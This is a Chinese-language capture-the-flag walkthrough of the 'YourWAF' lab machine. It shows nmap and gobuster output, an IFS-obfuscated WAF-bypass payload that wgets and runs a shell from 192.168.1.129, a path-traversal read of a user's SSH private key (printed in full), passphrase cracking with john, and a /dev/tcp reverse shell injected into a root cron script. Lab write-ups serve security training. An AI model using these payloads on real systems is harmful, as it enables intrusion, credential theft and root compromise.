# 靶场搭建
下载:YourWAF
Nat,IP: 192.168.1.131
# 渗透过程
# 信息初收集
PORT STATE SERVICE VERSION | |
22/tcp open ssh OpenSSH 9.2p1 Debian 2+deb12u2 (protocol 2.0) | |
| ssh-hostkey: | |
| 256 1c:ec:5c:5b:fd:fc:ba:f3:4c:1b:0b:70:e6:ef:bf:12 (ECDSA) | |
|_ 256 26:18:c8:ec:34:aa:d5:b9:28:a1:e2:83:b0:d3:45:2e (ED25519) | |
80/tcp open http Apache httpd 2.4.59 ((Debian)) | |
|_http-server-header: Apache/2.4.59 (Debian) | |
|_http-title: 403 Forbidden | |
3000/tcp open http Node.js (Express middleware) | |
|_http-title: Site doesn't have a title (text/html; charset=utf-8). |
80 端口访问不到,需要添加 hosts 才可以访问
┌──(root㉿kali)-[~] | |
└─# echo '192.168.1.131 www.yourwaf.nyx' >> /etc/hosts |
子域收集
┌──(root㉿kali)-[~] | |
└─# gobuster vhost -u http://yourwaf.nyx -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -t 100 --append-domain -t 30 --random-agent | |
=============================================================== | |
Gobuster v3.6 | |
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) | |
=============================================================== | |
[+] Url: http://yourwaf.nyx | |
[+] Method: GET | |
[+] Threads: 30 | |
[+] Wordlist: /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt | |
[+] User Agent: Opera/6.0 (Windows XP; U) [de] | |
[+] Timeout: 10s | |
[+] Append Domain: true | |
=============================================================== | |
Starting gobuster in VHOST enumeration mode | |
=============================================================== | |
Found: www.yourwaf.nyx Status: 200 [Size: 10722] | |
Found: maintenance.yourwaf.nyx Status: 200 [Size: 292] |
添加进去
访问发现 RCE,有黑名单,用这个 payload 弹 shell: IFS=];b=wget]192.168.1.129:8000/shell]-P]/tmp;$b;IFS=];c=chmod]+x]/tmp/shell;$c;IFS=];d=/tmp/shell;$d
监听,提交拿到 shell
# 提权
# tester
上传 pspy32 监听一下,发现有东西
2024/06/08 10:12:55 CMD: UID=0 PID=2874 | /bin/bash /opt/nodeapp/copylogs.sh |
查看了一下这个文件的权限,不可写,但这个目录像 nodejs 的服务端,所以看一下 server.js
const express = require('express')
const { exec } = require('child_process');
var path = require('path');
const app = express()
const port = 3000
const apiToken = '8c2b6a304191b8e2d81aaa5d1131d83d';
function checkApiToken(req, res, next) {
let sendApiToken = req.query["api-token"] ?? '';
if (apiToken !== sendApiToken) {
res.send("Unauthorized.")
return;
}
next();
}
app.use('/logs', (req, res) => {
let path_to_file = __dirname + '/logs/modsec_audit.log'
res.sendFile(path_to_file)
})
app.get('/', checkApiToken, (req, res) => {
res.send('API de mantenimiento!');
})
app.get('/restart', checkApiToken, (req, res) => {
exec('reboot', (error, stdout, stderr) => {
if (error) {
res.send(`exec error: ${error}`)
return;
}
res.send('Restarting server...');
});
})
app.get('/readfile', checkApiToken, (req, res) => {
let file = req.query["file"] ?? '';
if (file === '') {
res.send('Error: need file')
return;
}
if (file.indexOf('passwd') !== -1) {
res.send('ForbiddenError: Forbidden')
return;
}
let path_to_file = __dirname + file
res.sendFile(path.resolve(path_to_file))
})
app.listen(port, () => {
console.log(`Example app listening on port ${port}`)
})
看到了 token 和 readfile 路由,看到 passwd 中有 tester 这个用户,读 id_rsa
┌──(root㉿kali)-[~] | |
└─# curl 'http://192.168.1.131:3000/readfile?api-token=8c2b6a304191b8e2d81aaa5d1131d83d&file=../../..//home/tester/.ssh/id_rsa' | |
-----BEGIN OPENSSH PRIVATE KEY----- | |
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 | |
NOmwKPWS5rqFofpdCmmz/n4nRNM= | |
-----END OPENSSH PRIVATE KEY----- |
破解一下 passphrase
┌──(root㉿kali)-[~] | |
└─# john --wordlist=/root/techyou.txt hash --format=SSH | |
Using default input encoding: UTF-8 | |
Loaded 1 password hash (SSH, SSH private key [RSA/DSA/EC/OPENSSH 32/64]) | |
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 2 for all loaded hashes | |
Cost 2 (iteration count) is 16 for all loaded hashes | |
Will run 4 OpenMP threads | |
Press 'q' or Ctrl-C to abort, almost any other key for status | |
wafako (id_rsa) | |
1g 0:00:07:00 DONE (2024-06-08 04:41) 0.002375g/s 21.81p/s 21.81c/s 21.81C/s 111289..drogba | |
Use the "--show" option to display all of the cracked passwords reliably | |
Session completed. |
得到 wafako
SSH 上去
# root
id 发现是 copylogs 用户组的,那之前那个定时任务可以修改了
直接在 /opt/nodeapp/copylogs.sh 添加 bash -c "bash -i >& /dev/tcp/192.168.1.129/8888 0>&1"
监听,等待,root shell 就到手了
